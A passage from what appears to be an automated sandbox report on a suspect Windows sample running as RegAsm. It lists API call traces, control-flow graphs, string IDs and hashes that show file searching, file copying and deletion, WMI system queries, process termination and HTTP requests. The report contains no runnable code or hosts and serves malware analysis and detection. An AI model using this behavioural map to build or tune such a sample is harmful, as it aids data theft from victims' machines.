                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414900
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414A3E
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414AD3
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414C1D
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414CB2
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 00414CC1
                                                                                                                                                                                                                                                      • Part of subcall function 00413A00: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413A94
                                                                                                                                                                                                                                                      • Part of subcall function 00413A00: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00421BF9), ref: 00413AAB
                                                                                                                                                                                                                                                      • Part of subcall function 00413A00: StrStrA.SHLWAPI(00000000,00000000), ref: 00413AD7
                                                                                                                                                                                                                                                      • Part of subcall function 00413A00: lstrlenA.KERNEL32(00000000), ref: 00413AEC
                                                                                                                                                                                                                                                      • Part of subcall function 00413A00: lstrlenA.KERNEL32(00000000), ref: 00413B06
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                                                                                    • String ID: -$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                    • API String ID: 507064821-1903984052
                                                                                                                                                                                                                                                    • Opcode ID: 44e7a8a44be7a3562165129dc1a8c826065b556d6d69cf15c6c1486d36c3a708
                                                                                                                                                                                                                                                    • Instruction ID: c269cac61f73d8e2650fd55583616d4b120617d9023797c29fa6a8041a422022
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44e7a8a44be7a3562165129dc1a8c826065b556d6d69cf15c6c1486d36c3a708
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46B27274C01248EACB14FBA5C556ADDBFB86F15308F1041BEE84673682DB78674CCB66
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 2430 4163b8-4163bf 2431 4163c0-4163d4 StrCmpCA 2430->2431 2432 4166d4-4166e7 FindNextFileA 2431->2432 2433 4163da-4163ee StrCmpCA 2431->2433 2432->2431 2435 4166ed-416706 FindClose call 40fd50 2432->2435 2433->2432 2434 4163f4-416425 wsprintfA StrCmpCA 2433->2434 2436 416450-41646d wsprintfA 2434->2436 2437 416427-41644e wsprintfA 2434->2437 2443 41670a-416731 call 40fd50 * 2 2435->2443 2440 416470-4164b0 memset lstrcat strtok_s 2436->2440 2437->2440 2441 4164b2-4164c3 2440->2441 2442 4164df-41651c memset lstrcat strtok_s 2440->2442 2445 416671-416676 2441->2445 2452 4164c9-4164dd strtok_s 2441->2452 2442->2445 2446 416522-416532 PathMatchSpecA 2442->2446 2445->2432 2449 416678-416686 2445->2449 2450 4165c4-4165d8 strtok_s 2446->2450 2451 416538-4165c2 call 411310 wsprintfA call 40fd50 call 411790 call 4192a0 2446->2451 2449->2435 2455 416688-416690 2449->2455 2450->2446 2454 4165de 2450->2454 2451->2450 2472 4165e3-4165ee 2451->2472 2452->2441 2452->2442 2454->2445 2455->2432 2458 416692-4166ce call 401060 call 416310 2455->2458 2458->2432 2473 416732-416745 call 40fd50 2472->2473 2474 4165f4-41661a call 40fcd0 call 406d60 2472->2474 2473->2443 2481 416664-41666a 2474->2481 2482 41661c-41665f call 40fcd0 call 401060 call 415250 call 40fd50 2474->2482 2481->2445 2482->2481
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00427444,?,?,?,?,?,?,?,00416932,?), ref: 004163CC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00427448,?,?,?,?,?,?,?,00416932,?), ref: 004163E6
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0041640B
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00427173,?,?,?,?,?,?,?,?,?,?,?,00416932,?), ref: 0041641D
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00416445
                                                                                                                                                                                                                                                      • Part of subcall function 00411790: GetFileSizeEx.KERNEL32(00000000,?), ref: 004117BF
                                                                                                                                                                                                                                                      • Part of subcall function 00411790: CloseHandle.KERNEL32(00000000), ref: 004117CA
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00416467
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041647D
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416490
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 004164A6
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 004164D3
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004164EC
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 004164FC
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00416512
                                                                                                                                                                                                                                                    • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041652A
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0041656D
                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004165BB
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 004165CE
                                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,00416932,?), ref: 004166DF
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?,?,?,?,?,?,?,?,00416932,?), ref: 004166F1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strtok_swsprintf$CloseFileFindlstrcatmemset$HandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                    • String ID: %s%s$%s\%s$%s\%s\%s$2iA
                                                                                                                                                                                                                                                    • API String ID: 3008008253-767823974
                                                                                                                                                                                                                                                    • Opcode ID: 4d6b892a86baba640f6e2f93ba85ce246787114941fdb21951c7fd222483f9ca
                                                                                                                                                                                                                                                    • Instruction ID: 3914d2a0a16bc24c61f2490161fe216a0c65b09925b9b5bfdc8b5e5d053361c1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d6b892a86baba640f6e2f93ba85ce246787114941fdb21951c7fd222483f9ca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E71B8B1A00219ABDB24DFA0DC85EEE777DAF58704F10855EF50993241EB38DE88CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FF40: StrCmpCA.SHLWAPI(?,00000000,?,00407356,015CF8D0,?,00000000,?), ref: 0040FF4A
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 00411310: GetSystemTime.KERNEL32(?,015CF0B0,004270A0,?,00000000,00000008,?,?,00000000,004216B1,000000FF,?,0040452E,0041F9D9,00000014), ref: 00411365
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 004073FF
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004076B6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00407805
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268C8), ref: 00407814
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00407827
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268CC), ref: 00407836
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00407849
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268D0), ref: 00407858
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040786B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268D4), ref: 0040787A
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040788D
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268D8), ref: 0040789C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 004078AF
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268DC), ref: 004078BE
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00407905
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,004268E0), ref: 00407923
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 0040798A
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 00407999
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004076BD
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: memset.MSVCRT ref: 00411915
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407426,0040D964), ref: 00411946
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: HeapAlloc.KERNEL32(00000000,?,00407426,0040D964), ref: 0041194D
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: wsprintfW.USER32 ref: 0041195C
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: OpenProcess.KERNEL32(00001001,00000000), ref: 004119BD
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: TerminateProcess.KERNEL32(00000000,00000000), ref: 004119CC
                                                                                                                                                                                                                                                      • Part of subcall function 004118E0: CloseHandle.KERNEL32(00000000), ref: 004119D3
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004079F0
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,?,?,?,00426892), ref: 00407A18
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrcpy$HeapProcesslstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2944411387-0
                                                                                                                                                                                                                                                    • Opcode ID: 0dc964706491e1e789b6f216bf6cc462d48b7b356a0123e99c137502b1b01115
                                                                                                                                                                                                                                                    • Instruction ID: d445063f973bb5494ba5e5b507ab34cb809137a4ce24e3bfedff2f6959796d67
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0dc964706491e1e789b6f216bf6cc462d48b7b356a0123e99c137502b1b01115
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28325D71900249EADB14EBE4DC55AEEBB78AF15308F10417EF502736D2DB786A08CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 00411310: GetSystemTime.KERNEL32(?,015CF0B0,004270A0,?,00000000,00000008,?,?,00000000,004216B1,000000FF,?,0040452E,0041F9D9,00000014), ref: 00411365
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,004268CF,00000009), ref: 004096D6
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409842
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00409849
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 0040998F
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426AA8), ref: 0040999E
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 004099B1
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426AAC), ref: 004099C0
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 004099D3
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426AB0), ref: 004099E2
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 004099F5
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426AB4), ref: 00409A04
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00409A17
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426AB8), ref: 00409A26
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00409A39
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426ABC), ref: 00409A48
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00000000), ref: 00409A5B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(000000FF,00426AC0), ref: 00409A6A
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 00409AE0
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF), ref: 00409AEF
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409B45
                                                                                                                                                                                                                                                      • Part of subcall function 0040FF40: StrCmpCA.SHLWAPI(?,00000000,?,00407356,015CF8D0,?,00000000,?), ref: 0040FF4A
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00409B6D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1973479514-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000,?,00427208,00000000), ref: 00410F03
                                                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,00427220), ref: 00410F14
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00427AC0,00000000,00000001,004279F0,?,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000), ref: 00410F2E
                                                                                                                                                                                                                                                    • CoSetProxyBlanket.OLE32(00427208,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,00427220,00000000), ref: 00410F67
                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00410FC6
                                                                                                                                                                                                                                                      • Part of subcall function 00410E20: CoCreateInstance.OLE32(00427870,00000000,00000001,00427090,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?), ref: 00410E3D
                                                                                                                                                                                                                                                      • Part of subcall function 00410E20: SysAllocString.OLEAUT32(?), ref: 00410E4C
                                                                                                                                                                                                                                                      • Part of subcall function 00410E20: _wtoi64.MSVCRT ref: 00410E92
                                                                                                                                                                                                                                                      • Part of subcall function 00410E20: SysFreeString.OLEAUT32(?), ref: 00410EA8
                                                                                                                                                                                                                                                      • Part of subcall function 00410E20: SysFreeString.OLEAUT32(00000000), ref: 00410EAB
                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32( rB,?,?,?,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000,?), ref: 00411000
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000,?), ref: 0041100C
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?,Work Dir: In memory,00000000,?,00427208), ref: 00411013
                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00411057
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0041103F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                    • String ID: rB$%d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                    • API String ID: 1611285705-2786575689
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059D8
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000004), ref: 004059F0
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405A14
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,015D2480,00000000,00000000,-00400100,00000000), ref: 00405A4B
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405A6F
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405A7A
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405A98
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,0041FC49), ref: 00405AE5
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,0041FC49), ref: 00405B3B
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405B46
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00405B50
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405B5A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR$GET$k:A$k:A
                                                                                                                                                                                                                                                    • API String ID: 1851261701-3118052421
                                                                                                                                                                                                                                                    • Opcode ID: 76f035bfd736e22dddb9130d6b9ca766e22c9a7d25987a564a79ca6cc8bffafa
                                                                                                                                                                                                                                                    • Instruction ID: e13faa250e6eb6cbe25700fe933ef2aae1ec931dfedd094e0f55e824132fca57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76f035bfd736e22dddb9130d6b9ca766e22c9a7d25987a564a79ca6cc8bffafa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55615071900619AFEB10DBA4DC85FEFB779EB45704F00417AFA05B3281DB786E488BA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00412246
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 004122D3
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00412310
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00412359
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 004123A2
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 004123EA
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412575
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00412602
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
